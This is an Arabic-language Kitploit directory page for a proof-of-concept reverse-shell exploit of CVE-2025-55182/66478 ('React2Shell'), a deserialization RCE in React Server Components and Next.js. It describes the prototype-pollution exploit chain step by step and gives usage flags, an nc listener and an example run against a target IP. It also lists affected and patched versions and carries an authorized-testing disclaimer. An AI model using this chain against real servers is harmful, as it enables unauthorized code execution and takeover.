Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-66478-PoC-Reverse-Shell — إثبات مفهوم لاستغلال CVE-2025-55182/66478، وهي ثغرة إلغاء تسلسل في مكونات خادم React (React Server Components) تؤدي إلى تنفيذ أوامر عن بُعد (RCE)، عبر إرسال طلب متعدد الأجزاء مُصمم خصيصًا لتسليم قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/jotaespig/cve-2025-66478-poc-reverse-shell
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubjotaespig/cve-2025-66478-poc-reverse-shell

CVE-2025-66478-PoC-Reverse-Shell

إثبات مفهوم لاستغلال CVE-2025-55182/66478، وهي ثغرة إلغاء تسلسل في مكونات خادم React (React Server Components) تؤدي إلى تنفيذ أوامر عن بُعد (RCE)، عبر إرسال طلب متعدد الأجزاء مُصمم خصيصًا لتسليم قشرة عكسية.

عرض المستودع
1منذ 9س 3دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-66478 / CVE-2025-55182 ("React2Shell") — RSC Server Actions Deserialization RCE PoC

إثبات مفهوم لاستغلال CVE-2025-55182 — الملقب علنياً باسم "React2Shell" — وهي ثغرة تلويث النموذج الأولي (prototype pollution) من جهة الخادم في إلغاء تسلسل Server Actions لمكونات React Server Components (react-server-dom-webpack / -parcel / -turbopack)، والتي تتبعها Next.js تحت المعرّف CVE-2025-66478 (مرفوضة من NVD باعتبارها مكررة، لكنها لا تزال المعرّف الشائع الاستخدام عند مناقشة تأثير الثغرة على Next.js تحديداً).

طلب HTTP واحد متعدد الأجزاء (multipart) مصمم بعناية يلوّث Object.prototype و يسير عبر سلسلة النماذج الأولية للوصول إلى مُنشئ Function، مما يسمح لمهاجم غير مصادق بتشغيل كود Node.js عشوائي في عملية الخادم — بتقييم CVSS 10/10.

تفاصيل الثغرة

السبب الجذري. مُلغى تسلسل إجراءات RSC (requireModule) يحل مسارات الكائنات المرسلة من العميل (مثل ) دون التحقق من أن المفتاح الهدف ليس محجوزاً أو خطيراً مثل . تعيين على كائن عادي يلوّث نفسه، لذا كل كائن يُنشأ لاحقاً يرث الخاصية التي يتحكم بها المهاجم.

"$1:__proto__:then"
__proto__
__proto__
Object.prototype

سلسلة الاستغلال.

  1. then ← "$1:__proto__:then" — الوصول إلى سلسلة النماذج الأولية.
  2. _response._formData.get ← "$1:constructor:constructor" — الانتقال من النموذج الأولي الملوّث إلى مُنشئ Function.
  3. _response._prefix — سلسلة يتحكم بها المهاجم، تُدمج في كود يُنفَّذ عندما يحاول الخادم حل "thenable" المزيف (كائن شبيه بـ Promise). يضبط هذا الإثبات القيمة على process.mainModule.require('child_process').execSync('<cmd>').
  4. يُرسل الحمولة كحقلين متعددي الأجزاء (0, 1) في طلب POST إلى جذر التطبيق مع ترويسة Next-Action، والتي توجّه الطلب مباشرة إلى معالج Server Actions المعرّض للثغرة.

الإصدارات المتأثرة (وفق تقرير Datadog):

المكتبةالإصدارات المعرّضةالإصدارات المُصححة
react-server-dom-parcel19.0 – 19.2.019.0.1, 19.1.2, 19.2.1
react-server-dom-webpack19.0 – 19.2.019.0.1, 19.1.2, 19.2.1
react-server-dom-turbopack19.0 – 19.2.019.0.1, 19.1.2, 19.2.1

تتأثر Next.js في الإصدارات 15.x و16.x و14.3.0-canary.77+ عند استخدام App Router. تم التصحيح في 15.0.5 و15.1.9 و15.2.6 و15.3.6 و15.4.8 و15.5.7 و16.0.7.

إخلاء مسؤولية

للاستخدام في الاختبارات الأمنية المصرح بها والأغراض التعليمية فقط (مثل مختبرات CTF/HTB، أو البنية التحتية الخاصة بك، أو مهام بترخيص كتابي). لا تشغّل هذا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

المتطلبات

  • curl
  • bash
  • مستمع على جهاز المهاجم (مثل nc -lvnp <port>) ما لم تقدم أمرك الخاص عبر -c
  • يجب أن يعمل الهدف على busybox nc (أو عدّل -c إلى أي أداة شل متوفرة على الهدف) لكي يعمل أمر الصدفة العكسية الافتراضي

الاستخدام

root@kitploit:~
chmod +x exploit.sh
./exploit.sh -t <target> -L <lport> [options]
العلممطلوبالوصف
-t, --targetنعممضيف/عنوان IP الهدف الذي يشغّل تطبيق Next.js المعرّض للثغرة
-L, --lportنعم*المنفذ المحلي الذي يرتبط به المستمع الخاص بك
-p, --portلامنفذ الهدف (الافتراضي: 3000)
-l, --lhostلاعنوان IP الخاص بك لاستدعاء العودة (الافتراضي: اكتشاف تلقائي)
-i, --ifaceلاالواجهة لاكتشاف --lhost تلقائياً منها
-c, --commandلاأمر مخصص للتشغيل على الهدف (يتجاوز الصدفة العكسية الافتراضية)
--timeoutلامهلة طلب curl بالثواني (الافتراضي: 3)
-v, --verboseلاطباعة تفاصيل الطلب/الاستجابة
-h, --helpلاعرض المساعدة

* غير مطلوب إذا تم توفير -c/--command بدلاً من ذلك.

مثال

root@kitploit:~
# 1) ابدأ مستمعاً
rlwrap nc -lvnp 9090

# 2) شغّل الاستغلال
./exploit.sh -t 10.129.245.214 -L 9090

المراجع

  • CVE-2025-55182 "React2Shell": Remote Code Execution in React Server Components — Datadog Security Labs
تنزيل الأداة